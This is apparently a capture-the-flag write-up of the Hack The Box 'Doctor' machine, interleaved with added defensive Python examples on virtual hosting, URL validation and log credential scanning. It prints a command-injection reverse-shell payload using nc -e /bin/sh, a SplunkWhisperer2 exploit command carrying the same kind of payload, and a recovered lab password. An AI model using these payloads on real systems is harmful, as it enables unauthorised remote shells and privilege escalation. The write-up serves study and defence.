How I completed CTF on HTB::Doctor

In this write-up/blog post, I'll go through how I approached the target (Doctor on Hack The Box) and how I figured out the way to own the machine.

First, I scanned the target with nmap to find open ports and get some information on the services running on them.

nmap scan result for 10.10.10.209 (Doctor box)

Since it runs an HTTP server on port 80, I opened the target IP address in the web browser and visited the website, but I didn't find anything suspicious to hack.

Website rendered with target IP

I was scratching my head, finding nothing, when the address info@doctors.htb caught my eye, and I did something I hadn't thought of before.

I went to the terminal and typed sudo nano /etc/hosts to edit the hosts file on my local machine, or, put simply, to edit my local DNS.

After editing my local DNS, I went back to the web browser and this time browsed to the domain name (doctors.htb) instead of 10.10.10.209, and a different web page was rendered.

Webpage rendered on doctors.htb after editing hosts file

Isn't this amazing? A different web page was rendered even though the domain name points to the same IP address.

Let me explain why this happens. When you browse to a box using the appropriate domain name (in our case, doctors.htb), the web server selects the content to serve based on the Host header that your browser supplies (name-based virtual hosting). If you browse with the raw IP instead, that Host header matches no configured site, so you may land on a different web page or sometimes an error page.

You can see this in action right here. You browsed to medium.com and got the page rendered; now if you try browsing directly to 104.16.123.127, you'll be served a different page (in this case an error page).
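To make the Host header behaviour concrete, here is a miniature name-based virtual host router. It is an added example, not code from the write-up or from the Doctor box; the site bodies and the vhost table are constructed, and the fallback-to-default rule mirrors what Apache does when no ServerName matches.

```python
"""Name-based virtual hosting in miniature (added example, not from the write-up).

Assumption: one address serves a default site plus a site for doctors.htb.
Which one a client sees depends only on the Host header it sends.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed virtual-host table: server name -> response body
VHOSTS = {
    "doctors.htb": "<h1>doctors.htb site (constructed)</h1>",
}
DEFAULT_SITE = "<h1>default site (constructed)</h1>"


def select_vhost(host_header):
    """Return (vhost_name, body) for a Host header value.

    Like Apache's name-based virtual hosting: strip any ":port", compare
    case-insensitively, and fall back to the default site when nothing
    matches (a raw IP in the Host header, or no Host header at all).
    """
    if host_header is None:
        return "default", DEFAULT_SITE
    name = host_header.split(":", 1)[0].strip().lower()
    if name in VHOSTS:
        return name, VHOSTS[name]
    return "default", DEFAULT_SITE


class VHostHandler(BaseHTTPRequestHandler):
    """Tiny server that routes purely on the Host header."""

    def do_GET(self):
        _, body = select_vhost(self.headers.get("Host"))
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the example quiet
        pass


if __name__ == "__main__":
    # Try: curl -H "Host: doctors.htb" http://127.0.0.1:8080/
    # versus: curl http://127.0.0.1:8080/
    HTTPServer(("127.0.0.1", 8080), VHostHandler).serve_forever()
```

When testing a target you do not have to edit /etc/hosts at all: `curl -H "Host: doctors.htb" http://10.10.10.209/` sends the same Host header the browser would after the hosts-file change, which is a quick way to check whether a server is hiding another site behind a name.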

Okay, back to the action. I tried SQL injection on the login page, but it didn't work. I then looked at the register page, tried registering, and got registered.

doctors.htb/register page

I then logged in with the credentials I registered with.

Logging in with the credentials used to register

I was logged in as a user, looked around the application and discovered a page for making a new post. I then opened Netcat to listen on port 4444.

After running netcat on my local machine, I returned to the website and tried posting.

http://10.10.14.23/$(nc.traditional$IFS-e$IFS/bin/sh$IFS’10.10.14.23’$IFS’4444’) is vulnerable to RCE.

Here, 10.10.14.23 is my tunnel IP address; to make this work for you, replace it with your own tunnel IP address. Once the post is submitted, we get shell access to the machine as a low-privileged user.
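The post above works because the URL is handed to a shell, so `$(...)` and `$IFS` are expanded by /bin/sh. The following added example (not the box's code; the write-up does not show the server side, so the "command built around the URL" pattern is an assumption) contrasts that pattern with two fixes: validating the URL and passing it as an argv list so no shell ever parses it, or, if a shell is unavoidable, quoting it with shlex.quote.

```python
"""Handling a user-supplied URL safely before it reaches a command (added example).

Assumption (not shown in the write-up): the application interpolated the
posted URL into a shell command string. The functions below illustrate
the vulnerable pattern and its hardened forms; they build commands but
do not execute anything.
"""
import re
import shlex
from urllib.parse import urlsplit

# Hostnames may contain letters, digits, hyphens and dots only.
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]+$")
_ALLOWED_SCHEMES = {"http", "https"}
# Characters that have meaning to /bin/sh; rejected anywhere in the URL.
_SHELL_META = set("$`'\"\\;|&<>(){}")


def build_command_unsafe(url):
    """The vulnerable pattern: untrusted text spliced into a shell string.

    Returning the string instead of running it shows the problem: any
    $(...) survives verbatim and a shell would expand it.
    """
    return f"curl -s {url}"


def validate_url(url):
    """Return the URL unchanged if it is a plain http(s) URL, else raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in _ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed")
    if not parts.hostname or not _HOST_RE.match(parts.hostname):
        raise ValueError("hostname contains disallowed characters")
    if any(c.isspace() or c in _SHELL_META for c in url):
        raise ValueError("shell metacharacter in URL")
    return url


def is_safe_url(url):
    """Boolean wrapper around validate_url for callers that just want yes/no."""
    try:
        validate_url(url)
        return True
    except ValueError:
        return False


def build_command_safe(url):
    """Hardened form: validate, then pass argv as a list (no shell involved).

    Use with subprocess.run(build_command_safe(url)); "--" stops curl from
    treating a URL beginning with "-" as an option.
    """
    return ["curl", "-s", "--", validate_url(url)]


def build_command_quoted(url):
    """If a shell string is unavoidable, shlex.quote() neutralises metacharacters."""
    return f"curl -s {shlex.quote(url)}"


if __name__ == "__main__":
    constructed = "http://10.10.14.23/$(id)"  # constructed, harmless demo input
    print(build_command_unsafe(constructed))   # $(id) reaches the shell intact
    print(build_command_quoted(constructed))   # $(id) is now inside single quotes
    print(is_safe_url(constructed), is_safe_url("https://doctors.htb/blog"))
```

The argv-list form is the one to prefer: with no shell in the path, `$IFS` and `$(...)` are just bytes in an argument, and the validator is a second layer rather than the only one.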

When I tried to view the user flag, permission was denied.

While moving around the website I had discovered the /reset_password path, where a user can enter an email address and reset the password. Since the site was running on an Apache server, I tried accessing the server's log files and looked for a password in the backup log file.

I found that the password of the user shaun was Guitar123, logged in as shaun and captured the user flag.
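The password was recoverable because the request line, query string included, is written to the access log. The scanner below is an added example (not from the write-up or the box) that walks Apache-style log lines and flags requests whose query string carries a credential-like parameter; the log lines and the secret value are constructed.

```python
"""Find credentials leaked into web server access logs (added example).

Web servers log the full request line, so any form that submits a
secret in a GET query string writes that secret to disk, and to every
backup of the log. This scanner flags such lines. Log lines below are
constructed for the example; nothing here comes from the Doctor box.
"""
import re
from urllib.parse import urlsplit, parse_qs

SENSITIVE_PARAMS = {"password", "passwd", "pwd", "pass", "token", "secret"}

# Apache common/combined format: client ident user [time] "request" status ...
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) '
)

# Constructed sample log (the secret value is a placeholder, not a real credential)
SAMPLE_LOG = """\
10.10.14.23 - - [05/Sep/2020:11:17:34 +0000] "GET / HTTP/1.1" 200 4412
10.10.14.23 - - [05/Sep/2020:11:17:56 +0000] "GET /reset_password?email=user@doctors.htb&password=EXAMPLE_SECRET HTTP/1.1" 500 453
10.10.14.23 - - [05/Sep/2020:11:18:02 +0000] "POST /login HTTP/1.1" 302 0
"""


def find_leaked_credentials(log_text):
    """Return one dict per log line whose query string names a sensitive parameter.

    The secret itself is deliberately not copied into the result; the point
    of the scan is to locate the leak, not to collect passwords.
    """
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = m.group("request").split(" ")
        if len(parts) < 2:
            continue
        method, target = parts[0], parts[1]
        split = urlsplit(target)
        if not split.query:
            continue
        for name in parse_qs(split.query, keep_blank_values=True):
            if name.lower() in SENSITIVE_PARAMS:
                hits.append({
                    "line": lineno,
                    "client": m.group("client"),
                    "method": method,
                    "path": split.path,
                    "param": name,
                })
    return hits


if __name__ == "__main__":
    for hit in find_leaked_credentials(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['method']} {hit['path']} leaks '{hit['param']}'")
```

The fix on the application side is to accept secrets only in a POST body (which Apache does not log) and, for routes like password reset, to configure the log format or a conditional `CustomLog` so the query string is never written; the scanner is for finding what has already leaked into old and backup logs.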

You may have looked at the nmap scan result earlier and noticed that port 8089 is open, with Splunk running on it. So I googled for "splunk exploit on github" and found the SplunkWhisperer2 Python script by cnotin.

I created a file with nano splunk-exploit.py, copied the script into it and saved it. After this, I ran netcat on port 4445 and ran the exploit with the command:

python3 splunk-exploit.py --host 10.10.10.209 --lhost 10.10.14.23 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/sh '10.10.14.23' '4445'"

Here, replace 10.10.14.23 with your own tunnel IP address.

It gave me root access within a few seconds and I captured the root flag.

Share any suggestions you have, and what you liked and disliked in this write-up.
